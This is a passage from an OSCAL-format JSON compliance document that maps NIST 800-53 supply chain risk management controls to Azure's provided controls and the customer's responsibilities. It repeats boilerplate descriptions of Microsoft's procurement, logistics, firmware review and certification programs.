redundancies across Systems Integrators and components suppliers wherever possible. There is a team which drives continuous analysis of multi-source vs single source and end of life transitions for components across the Bill of Materials. Strategic purchases and inventories are held in an ongoing program to ensure supply of critical components and last time purchases. Supplier financial health is assessed routinely with risk assessments and deeper engagements on areas of concern. Asset Classification and Risk Assessments are determined by a \"One Microsoft\" team at initial infrastructure design and build to meet market/customer compliance boundary requirements. In addition, there are existing process for each service to provide its offering in each boundary. In addition, processes are in place for designated high integrity devices and services. Logistics Microsoft continues to increase assurance in the complex cloud global supply chain with next generation visibility by implementing a new global control tower capability, the next generation of supply chain visibility. The new capability delivers proactive intelligence on potential disruptions including weather, traffic, and global events, that allows Microsoft to notify our customer as the disruptions occur to adjust and deliver successfully. In addition, Microsoft is placing sensors on high value shipments with GPS capability supported by light and temperature detections at fifteen (15) minute tracking intervals. Validation Microsoft employs a capability to discover, configure, and validate in-rack hardware. The validation is executed at the original equipment manufacturer (OEM) prior to shipment and again at the Microsoft datacenter. Firmware Microsoft employs firmware source code guidance, reviews, and penetration tests to identify security vulnerabilities at the firmware level. Global Security Ecosystem Support Capabilities including Threat Intelligence, Digital Crime Unit, Cyber Defense Operations Center, and Service Security Teams, the Azure Red Team coordinated overt and covert activities to validate and strengthen the Global Azure and Specific Sovereign Infrastructures. In addition, the Third Party Assessment Organization (3PAO) penetration tests are part of the overall certifications. Industry Leadership The Microsoft Supply Chain Security program maintains industry-leading low loss levels across the various supply chains for the past five (5) years. Microsoft is Tier 3 certified with Customs Trade Partnership Against Terrorism (CTPAT), a Homeland Security / Customs and Border Protection program, and Authorized Economic Operator (AEO) certified in India, pending Australia. Global Leadership and Partnerships Microsoft members maintain leadership roles in the Transported Asset Protection Association (TAPA) and the Alliance for Gray Market and Counterfeit Abatement (AGMA). In addition, Microsoft maintains active representation in the European Union, North Atlantic Treaty Organization, and World Trade Organization."}],"responsibilities":[{"uuid":"e7a6cb3e-181d-4243-8f54-39033bdeb768","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-010"}],"description":"The customer is responsible for establishing processes to identify and addresses weaknesses or deficiencies in supply chain elements and processes of customer-deployed resources in coordination with customer-defined supply chain personnel.","provided-uuid":"2b55cc08-70da-4c49-9287-ebb4289853f5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8fc07cb6-6f06-4b1b-b8be-21dcf170f0a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-3_smt.b","by-components":[{"uuid":"68c010ef-2bdf-4468-b2f6-312f62d628c5","export":{"provided":[{"uuid":"3237cd67-7077-4099-8c91-dcf6b0f31f40","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-011"}],"description":"Azure has deployed supply chain controls described in SR-3 control part a above. The controls are designed to protect against supply chain risks to Azure cloud environments and to limit harm or consequences from supply chain related events."}],"responsibilities":[{"uuid":"53d11707-cb63-42fe-a778-f26494919918","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-011"}],"description":"The customer is responsible for employing controls to protect against supply chain risk to the system, system component, or system service and to limit harm or consequences from supply chain-related events for customer-deployed resources.","provided-uuid":"3237cd67-7077-4099-8c91-dcf6b0f31f40"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"15441fb0-c926-400e-a46f-a93d5e7f70ec","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-3_smt.c","by-components":[{"uuid":"e3991a30-5212-4325-89af-c5045f6af7da","export":{"provided":[{"uuid":"f710d37b-759b-4ecd-99f7-44a7ec7b215c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-012"}],"description":"Azure has documented the supply chain processes and controls described in SR-3 control above as part of Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP), and Supply Chain Risk Management Plan documents."}],"responsibilities":[{"uuid":"db7fa581-f692-4cd3-973f-0577eba9bff4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-012"}],"description":"The customer is responsible for documenting the selected and implemented supply chain processes and controls in security, privacy, or supply chain management plan document for customer-deployed resources.","provided-uuid":"f710d37b-759b-4ecd-99f7-44a7ec7b215c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"28684fca-88e6-4157-bfb6-4883c38376a4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-5","statements":[{"uuid":"b3538304-64a0-4649-80da-f6c75ac9298c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-5_smt","by-components":[{"uuid":"5b06e77b-eb55-4f52-9a86-35721cdd3fdf","export":{"provided":[{"uuid":"6c57b4ee-fc13-43af-a6bf-0d241b215788","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-013"}],"description":"Azure has established the following supply chain acquisition strategies, contract tools, and procurement methods to support Azure cloud environments. \"One Microsoft\" Supply Chain assurance efforts consist of numerous capabilities executing a corporate strategy that contributes to protecting Azure. Procurement During the initial supply chain phase, the Procurement team protects against supply chain threats by facilitating the creation of the purchase order to our suppliers ensuring consistency in approach. <https://www.microsoft.com/en-us/procurement/supplier-contracting.aspx> Customer Operations Customer Operations performs routine business reviews with our suppliers representing the needs and concerns of all Azure business groups. This team also works to support Azure business groups on standards definition and service capability. A key function of this team is to protect against any threats posed by suppliers during manufacturing by ensuring adherence to standard supply chain methodologies and process adherence. Deployment Quality System integration or upon delivery of services to our Azure datacenters for deployment; Deployment Quality works to ensure final delivery of the system to the Azure business group is done on-time and free of defects. Working in conjunction with the Supply Chain Automation, these capabilities monitor performance metrics, capture business group feedback, and lead cross-functional Supply Chain. Supplier Relationship Management (SRM) As services move into the operations and maintenance phase of the life cycle, SRM protects Azure by managing and facilitating the supplier complaint process to drive root cause and corrective action within the suppliers' supply chain. Supplier scorecards allow Azure to compare and visibly monitor the performance of our supply base utilizing a balanced scorecard approach. Spares Spares Management protects against supply chain threats by managing the determination and execution of obtaining spare components to support deployed devices within our Azure datacenters. Parts are spared to significantly reduce downtime of production equipment during a trouble-shooting scenario, helping to ensure site uptime for our business. To ensure security of the supply chain and protection against threats, Azure uses well-established suppliers with a proven track record to secure supply chain management. In addition, these suppliers have established Service Level Agreements with critical providers to ensure that additional spare parts and maintenance activities are performed in a timely manner. Business Continuity Microsoft manages a comprehensive Continuity of Supply program with redundancies across Systems Integrators and components suppliers wherever possible. There is a team which drives continuous analysis of multi-source vs single source and end of life transitions for components across the Bill of Materials. Strategic purchases and inventories are held in an ongoing program to ensure supply of critical components and last time purchases. Supplier financial health is assessed routinely with risk assessments and deeper engagements on areas of concern. Asset Classification and Risk Assessments are determined by a \"One Microsoft\" team at initial infrastructure design and build to meet market/customer compliance boundary requirements. In addition, there are existing process for each service to provide its offering in each boundary. In addition, processes are in place for designated high integrity devices and services. Logistics Microsoft continues to increase assurance in the complex cloud global supply chain with next generation visibility by implementing a new global control tower capability, the next generation of supply chain visibility. The new capability delivers proactive intelligence on potential disruptions including weather, traffic, and global events, that allows Microsoft to notify our customer as the disruptions occur to adjust and deliver successfully. In addition, Microsoft is placing sensors on high value shipments with GPS capability supported by light and temperature detections at fifteen (15) minute tracking intervals. Validation Microsoft employs a capability to discover, configure, and validate in-rack hardware. The validation is executed at the original equipment manufacturer (OEM) prior to shipment and again at the Microsoft datacenter. Firmware Microsoft employs firmware source code guidance, reviews, and penetration tests to identify security vulnerabilities at the firmware level. Global Security Ecosystem Support Capabilities including Threat Intelligence, Digital Crime Unit, Cyber Defense Operations Center, and Service Security Teams, the Azure Red Team coordinated overt and covert activities to validate and strengthen the Global Azure and Specific Sovereign Infrastructures. In addition, the Third Party Assessment Organization (3PAO) penetration tests are part of the overall certifications. Industry Leadership The Microsoft Supply Chain Security program maintains industry-leading low loss levels across the various supply chains for the past five (5) years. Microsoft is Tier 3 certified with Customs Trade Partnership Against Terrorism (CTPAT), a Homeland Security / Customs and Border Protection program, and Authorized Economic Operator (AEO) certified in India, pending Australia. Global Leadership and Partnerships Microsoft members maintain leadership roles in the Transported Asset Protection Association (TAPA) and the Alliance for Gray Market and Counterfeit Abatement (AGMA). In addition, Microsoft maintains active representation in the European Union, North Atlantic Treaty Organization, and World Trade Organization."}],"responsibilities":[{"uuid":"13439a0e-dfe0-4325-b435-345cd7e4f6e5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-013"}],"description":"The customer is responsible for employing acquisition strategies, contract tools, and procurement methods for customer-deployed resources to protect against supply chain risks. The customer is responsible for employing organization-defined tailored acquisition strategies, contract tools, and procurement methods for the purchase of the information system, system component, or information system service from suppliers.","provided-uuid":"6c57b4ee-fc13-43af-a6bf-0d241b215788"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2fa866ba-5f00-4003-82c9-e003c8cc8a94","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-6","statements":[{"uuid":"fc957fb4-1157-4d8b-8632-e60348bb2ec0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-014"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-6_smt","by-components":[{"uuid":"0eed6841-5392-430e-ba5f-72dad0f96806","export":{"provided":[{"uuid":"33cd77f2-b5bc-4d3e-8163-75e8dfed1d50","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-014"}],"description":"\"One Microsoft\" Supply Chain assurance efforts consist of numerous capabilities executing a corporate strategy that contributes to protecting Azure. The following efforts take place for Azure to assess and review the supply chain-related risks associated with supplier or contacts and Azure components they provide on an at least annual cadence. Procurement During the initial supply chain phase, the Procurement team protects against supply chain threats by facilitating the creation of the purchase order to our suppliers ensuring consistency in approach. <https://www.microsoft.com/en-us/procurement/supplier-contracting.aspx> Customer Operations Customer Operations performs routine business reviews with our suppliers representing the needs and concerns of all Azure business groups. This team also works to support Azure business groups on standards definition and service capability. A key function of this team is to protect against any threats posed by suppliers during manufacturing by ensuring adherence to standard supply chain methodologies and process adherence. Deployment Quality System integration or upon delivery of services to our Azure datacenters for deployment; Deployment Quality works to ensure final delivery of the system to the Azure business group is done on-time and free of defects. Working in conjunction with the Supply Chain Automation, these capabilities monitor performance metrics, capture business group feedback, and lead cross-functional Supply Chain. Supplier Relationship Management (SRM) As services move into the operations and maintenance phase of the life cycle, SRM protects Azure by managing and facilitating the supplier complaint process to drive root cause and corrective action within the suppliers' supply chain. Supplier scorecards allow Azure to compare and visibly monitor the performance of our supply base utilizing a balanced scorecard approach. Spares Spares Management protects against supply chain threats by managing the determination and execution of obtaining spare components to support deployed devices within our Azure datacenters. Parts are spared to significantly reduce downtime of production equipment during a trouble-shooting scenario, helping to ensure site uptime for our business. To ensure security of the supply chain and protection against threats, Azure uses well-established suppliers with a proven track record to secure supply chain management. In addition, these suppliers have established Service Level Agreements with critical providers to ensure that additional spare parts and maintenance activities are performed in a timely manner. Business Continuity Microsoft manages a comprehensive Continuity of Supply program with redundancies across Systems Integrators and components suppliers wherever possible. There is a team which drives continuous analysis of multi-source vs single source and end of life transitions for components across the Bill of Materials. Strategic purchases and inventories are held in an ongoing program to ensure supply of critical components and last time purchases. Supplier financial health is assessed routinely with risk assessments and deeper engagements on areas of concern. Asset Classification and Risk Assessments are determined by a \"One Microsoft\" team at initial infrastructure design and build to meet market/customer compliance boundary requirements. In addition, there are existing process for each service to provide its offering in each boundary. In addition, processes are in place for designated high integrity devices and services. Logistics Microsoft continues to increase assurance in the complex cloud global supply chain with next generation visibility by implementing a new global control tower capability, the next generation of supply chain visibility. The new capability delivers proactive intelligence on potential disruptions including weather, traffic, and global events, that allows Microsoft to notify our customer as the disruptions occur to adjust and deliver successfully. In addition, Microsoft is placing sensors on high value shipments with GPS capability supported by light and temperature detections at fifteen (15) minute tracking intervals. Validation Microsoft employs a capability to discover, configure, and validate in-rack hardware. The validation is executed at the original equipment manufacturer (OEM) prior to shipment and again at the Microsoft datacenter. Firmware Microsoft employs firmware source code guidance, reviews, and penetration tests to identify security vulnerabilities at the firmware level. Global Security Ecosystem Support Capabilities including Threat Intelligence, Digital Crime Unit, Cyber Defense Operations Center, and Service Security Teams, the Azure Red Team coordinated overt and covert activities to validate and strengthen the Global Azure and Specific Sovereign Infrastructures. In addition, the Third Party Assessment Organization (3PAO) penetration tests are part of the overall certifications. Industry Leadership The Microsoft Supply Chain Security program maintains industry-leading low loss levels across the various supply chains for the past five (5) years. Microsoft is Tier 3 certified with Customs Trade Partnership Against Terrorism (CTPAT), a Homeland Security / Customs and Border Protection program, and Authorized Economic Operator (AEO) certified in India, pending Australia. Global Leadership and Partnerships Microsoft members maintain leadership roles in the Transported Asset Protection Association (TAPA) and the Alliance for Gray Market and Counterfeit Abatement (AGMA). In addition, Microsoft maintains active representation in the European Union, North Atlantic Treaty Organization, and World Trade Organization."}],"responsibilities":[{"uuid":"a456156d-fe99-413b-a803-74ae94b5ba3a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-014"}],"description":"The customer is responsible for assessing and reviewing the supply chain related risks associated with suppliers or contractors and the system, system component, or system service they provide for customer-deployed resources at a defined frequency.","provided-uuid":"33cd77f2-b5bc-4d3e-8163-75e8dfed1d50"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6a8150e1-cc30-44c6-ab04-dcf3b2b082d3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-8","statements":[{"uuid":"750f786e-7658-42df-83bc-c10aea90fae1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-8_smt","by-components":[{"uuid":"a1a24e1c-b349-4f01-826c-53231a7c26e5","export":{"provided":[{"uuid":"6a17c7ee-6f1c-454f-8cac-0455a01afded","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-015"}],"description":"As part of Microsoft Supply Chain Security Program, Azure deploys a team responsible for leading and supporting supply chain risk management activities. The team members are introduced to industry-leading supply chain quality programs to support Azure cloud environments. The team members have established agreements and procedures with various Azure partner teams of supply chain such as Azure Security, Azure Federal Compliance, and CELA teams for the notification of supply chain compromises and findings that are a result of assessments. If findings are identified, stakeholders of Azure cloud environments are notified through the approval of CELA on communication plans. Remediation plans for supply chain compromises or findings during assessments are formulated to track until implementation by team members who lead and support supply chain risk management activities."}],"responsibilities":[{"uuid":"bb4e842e-6429-404f-925b-e009ed673c77","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-015"}],"description":"The customer is responsible for establishing agreements and procedures with entities involved in the supply chain for customer-deployed resources to notify against supply chain compromise and results of assessments or audits for customer-defined information.","provided-uuid":"6a17c7ee-6f1c-454f-8cac-0455a01afded"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"75df5fec-3e67-407c-82d4-6550fc4152f1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-9","statements":[{"uuid":"71620cbd-3b79-4690-8243-21c9bb3c05e6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-016"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-9_smt","by-components":[{"uuid":"65ff1430-c9fa-4c9b-ae36-99423688d48b","export":{"provided":[{"uuid":"67e3b3c2-d01f-4ea6-9e34-83ff220b642c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-016"}],"description":"\"One Microsoft\" Supply Chain assurance efforts consist of numerous capabilities executing a corporate strategy that contributes to protecting Azure. The efforts described below are designed to ensure the enforcement of supply chain controls, including tamper protection for information system components supporting Azure cloud environments: #### Procurement During the initial supply chain phase, the Procurement team protects against supply chain threats by facilitating the creation of the purchase order to our suppliers ensuring consistency in approach. <https://www.microsoft.com/en-us/procurement/supplier-contracting.aspx> Customer Operations Customer Operations performs routine business reviews with our suppliers representing the needs and concerns of all Azure business groups. This team also works to support Azure business groups on standards definition and service capability. A key function of this team is to protect against any threats posed by suppliers during manufacturing by ensuring adherence to standard supply chain methodologies and process adherence. Deployment Quality System integration or upon delivery of services to our Azure datacenters for deployment; Deployment Quality works to ensure final delivery of the system to the Azure business group is done on-time and free of defects. Working in conjunction with the Supply Chain Automation, these capabilities monitor performance metrics, capture business group feedback, and lead cross-functional Supply Chain. Supplier Relationship Management (SRM) As services move into the operations and maintenance phase of the life cycle, SRM protects Azure by managing and facilitating the supplier complaint process to drive root cause and corrective action within the suppliers' supply chain. Supplier scorecards allow Azure to compare and visibly monitor the performance of our supply base utilizing a balanced scorecard approach. Spares Spares Management protects against supply chain threats by managing the determination and execution of obtaining spare components to support deployed devices within our Azure datacenters. Parts are spared to significantly reduce downtime of production equipment during a trouble-shooting scenario, helping to ensure site uptime for our business. To ensure security of the supply chain and protection against threats, Azure uses well-established suppliers with a proven track record to secure supply chain management. In addition, these suppliers have established Service Level Agreements with critical providers to ensure that additional spare parts and maintenance activities are performed in a timely manner. Business Continuity Microsoft manages a comprehensive Continuity of Supply program with redundancies across Systems Integrators and components suppliers wherever possible. There is a team which drives continuous analysis of multi-source vs single source and end of life transitions for components across the Bill of Materials. Strategic purchases and inventories are held in an ongoing program to ensure supply of critical components and last time purchases. Supplier financial health is assessed routinely with risk assessments and deeper engagements on areas of concern. Asset Classification and Risk Assessments are determined by a \"One Microsoft\" team at initial infrastructure design and build to meet market/customer compliance boundary requirements. In addition, there are existing process for each service to provide its offering in each boundary. In addition, processes are in place for designated high integrity devices and services. Logistics Microsoft continues to increase assurance in the complex cloud global supply chain with next generation visibility by implementing a new global control tower capability, the next generation of supply chain visibility. The new capability delivers proactive intelligence on potential disruptions including weather, traffic, and global events, that allows Microsoft to notify our customer as the disruptions occur to adjust and deliver successfully. In addition, Microsoft is placing sensors on high value shipments with GPS capability supported by light and temperature detections at fifteen (15) minute tracking intervals. Validation Microsoft employs a capability to discover, configure, and validate in-rack hardware. The validation is executed at the original equipment manufacturer (OEM) prior to shipment and again at the Microsoft datacenter. Firmware Microsoft employs firmware source code guidance, reviews, and penetration tests to identify security vulnerabilities at the firmware level. Global Security Ecosystem Support Capabilities including Threat Intelligence, Digital Crime Unit, Cyber Defense Operations Center, and Service Security Teams, the Azure Red Team coordinated overt and covert activities to validate and strengthen the Global Azure and Specific Sovereign Infrastructures. In addition, the Third Party Assessment Organization (3PAO) tests are part of the overall certifications. Industry Leadership The Microsoft Supply Chain Security program maintains industry-leading low loss levels across the various supply chains for the past five (5) years. Microsoft is Tier 3 certified with Customs Trade Partnership Against Terrorism (CTPAT), a Homeland Security / Customs and Border Protection program, and Authorized Economic Operator (AEO) certified in India, pending Australia. Global Leadership and Partnerships Microsoft members maintain leadership roles in the Transported Asset Protection Association (TAPA) and the Alliance for Gray Market and Counterfeit Abatement (AGMA). In addition, Microsoft maintains active representation in the European Union, North Atlantic Treaty Organization, and World Trade Organization."}],"responsibilities":[{"uuid":"b651b3a6-b998-4e3d-9ade-a7c7e63f47a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-016"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for protecting customer-deployed resources against supply chain threats as part of a comprehensive, defense-in-breadth information security strategy.","provided-uuid":"67e3b3c2-d01f-4ea6-9e34-83ff220b642c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"88a457ad-abd8-453b-ae36-e02af66346d8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-9.1","statements":[{"uuid":"1ab8381e-f662-4c40-a703-ff59ecda105f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-9.1_smt","by-components":[{"uuid":"d7510106-3506-4fdc-beb8-1d5d430a2659","export":{"provided":[{"uuid":"160dd627-ce9e-48fd-adc6-c938dcc9c214","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-017"}],"description":"\"One Microsoft\" Supply Chain assurance efforts consist of numerous capabilities executing a corporate strategy that contributes to protecting Azure. The efforts described below are designed to ensure the enforcement of supply chain controls, including tamper protection for information system components supporting Azure cloud environments: Procurement During the initial supply chain phase, the Procurement team protects against supply chain threats by facilitating the creation of the purchase order to our suppliers ensuring consistency in approach. <https://www.microsoft.com/en-us/procurement/supplier-contracting.aspx> Customer Operations Customer Operations performs routine business reviews with our suppliers representing the needs and concerns of all Azure business groups. This team also works to support Azure business groups on standards definition and service capability. A key function of this team is to protect against any threats posed by suppliers during manufacturing by ensuring adherence to standard supply chain methodologies and process adherence. Deployment Quality System integration or upon delivery of services to our Azure datacenters for deployment; Deployment Quality works to ensure final delivery of the system to the Azure business group is done on-time and free of defects. Working in conjunction with the Supply Chain Automation, these capabilities monitor performance metrics, capture business group feedback, and lead cross-functional Supply Chain. Supplier Relationship Management (SRM) As services move into the operations and maintenance phase of the life cycle, SRM protects Azure by managing and facilitating the supplier complaint process to drive root cause and corrective action within the suppliers' supply chain. Supplier scorecards allow Azure to compare and visibly monitor the performance of our supply base utilizing a balanced scorecard approach. Spares Spares Management protects against supply chain threats by managing the determination and execution of obtaining spare components to support deployed devices within our Azure datacenters. Parts are spared to significantly reduce downtime of production equipment during a trouble-shooting scenario, helping to ensure site uptime for our business. To ensure security of the supply chain and protection against threats, Azure uses well-established suppliers with a proven track record to secure supply chain management. In addition, these suppliers have established Service Level Agreements with critical providers to ensure that additional spare parts and maintenance activities are performed in a timely manner. Business Continuity Microsoft manages a comprehensive Continuity of Supply program with redundancies across Systems Integrators and components suppliers wherever possible. There is a team which drives continuous analysis of multi-source vs single source and end of life transitions for components across the Bill of Materials. Strategic purchases and inventories are held in an ongoing program to ensure supply of critical components and last time purchases. Supplier financial health is assessed routinely with risk assessments and deeper engagements on areas of concern. Asset Classification and Risk Assessments are determined by a \"One Microsoft\" team at initial infrastructure design and build to meet market/customer compliance boundary requirements. In addition, there are existing process for each service to provide its offering in each boundary. In addition, processes are in place for designated high integrity devices and services. Logistics Microsoft continues to increase assurance in the complex cloud global supply chain with next generation visibility by implementing a new global control tower capability, the next generation of supply chain visibility. The new capability delivers proactive intelligence on potential disruptions including weather, traffic, and global events, that allows Microsoft to notify our customer as the disruptions occur to adjust and deliver successfully. In addition, Microsoft is placing sensors on high value shipments with GPS capability supported by light and temperature detections at fifteen (15) minute tracking intervals. Validation Microsoft employs a capability to discover, configure, and validate in-rack hardware. The validation is executed at the original equipment manufacturer (OEM) prior to shipment and again at the Microsoft datacenter. Firmware Microsoft employs firmware source code guidance, reviews, and penetration tests to identify security vulnerabilities at the firmware level. Global Security Ecosystem Support Capabilities including Threat Intelligence, Digital Crime Unit, Cyber Defense Operations Center, and Service Security Teams, the Azure Red Team coordinated overt and covert activities to validate and strengthen the Global Azure and Specific Sovereign Infrastructures. In addition, the Third-Party Assessment Organization (3PAO) penetration tests are part of the overall certifications. Industry Leadership The Microsoft Supply Chain Security program maintains industry-leading low loss levels across the various supply chains for the past five (5) years. Microsoft is Tier 3 certified with Customs Trade Partnership Against Terrorism (CTPAT), a Homeland Security / Customs and Border Protection program, and Authorized Economic Operator (AEO) certified in India, pending Australia. Global Leadership and Partnerships Microsoft members maintain leadership roles in the Transported Asset Protection Association (TAPA) and the Alliance for Gray Market and Counterfeit Abatement (AGMA). In addition, Microsoft maintains active representation in the European Union, North Atlantic Treaty Organization, and World Trade Organization."}],"responsibilities":[{"uuid":"6bdb24cd-0e29-4e3e-b25f-6f1cdbfe876f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-017"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for employing anti-tamper technologies, tools, and techniques throughout the system development life cycle.","provided-uuid":"160dd627-ce9e-48fd-adc6-c938dcc9c214"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"4103049d-0cf4-4ec8-955b-330fc7ecbbce","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-10","statements":[{"uuid":"06c64f5f-836a-49a5-9025-93be977a267d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-10_smt","by-components":[{"uuid":"9ea2a9f6-48b6-490e-9d2c-8699103b2fa3","export":{"provided":[{"uuid":"f37b4a04-f40a-46e8-8d86-5e3a9ece763c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-018"}],"description":"\"One Microsoft\" Supply Chain assurance efforts consist of numerous capabilities executing a corporate strategy that contributes to protecting Azure. The efforts described below are designed to ensure the enforcement of supply chain controls, including inspection of system components that make up Azure cloud environments at a random occurrence to detect and respond to physical and logical tampering: Procurement During the initial supply chain phase, the Procurement team protects against supply chain threats by facilitating the creation of the purchase order to our suppliers ensuring consistency in approach. <https://www.microsoft.com/en-us/procurement/supplier-contracting.aspx> Customer Operations Customer Operations performs routine business reviews with our suppliers representing the needs and concerns of all Azure business groups. This team also works to support Azure business groups on standards definition and service capability. A key function of this team is to protect against any threats posed by suppliers during manufacturing by ensuring adherence to standard supply chain methodologies and process adherence. Deployment Quality System integration or upon delivery of services to our Azure datacenters for deployment; Deployment Quality works to ensure final delivery of the system to the Azure business group is done on-time and free of defects. Working in conjunction with the Supply Chain Automation, these capabilities monitor performance metrics, capture business group feedback, and lead cross-functional Supply Chain. Supplier Relationship Management (SRM) As services move into the operations and maintenance phase of the life cycle, SRM protects Azure by managing and facilitating the supplier complaint process to drive root cause and corrective action within the suppliers' supply chain. Supplier scorecards allow Azure to compare and visibly monitor the performance of our supply base utilizing a balanced scorecard approach. Spares Spares Management protects against supply chain threats by managing the determination and execution of obtaining spare components to support deployed devices within our Azure datacenters. Parts are spared to significantly reduce downtime of production equipment during a trouble-shooting scenario, helping to ensure site uptime for our business. To ensure security of the supply chain and protection against threats, Azure uses well-established suppliers with a proven track record to secure supply chain management. In addition, these suppliers have established Service Level Agreements with critical providers to ensure that additional spare parts and maintenance activities are performed in a timely manner. 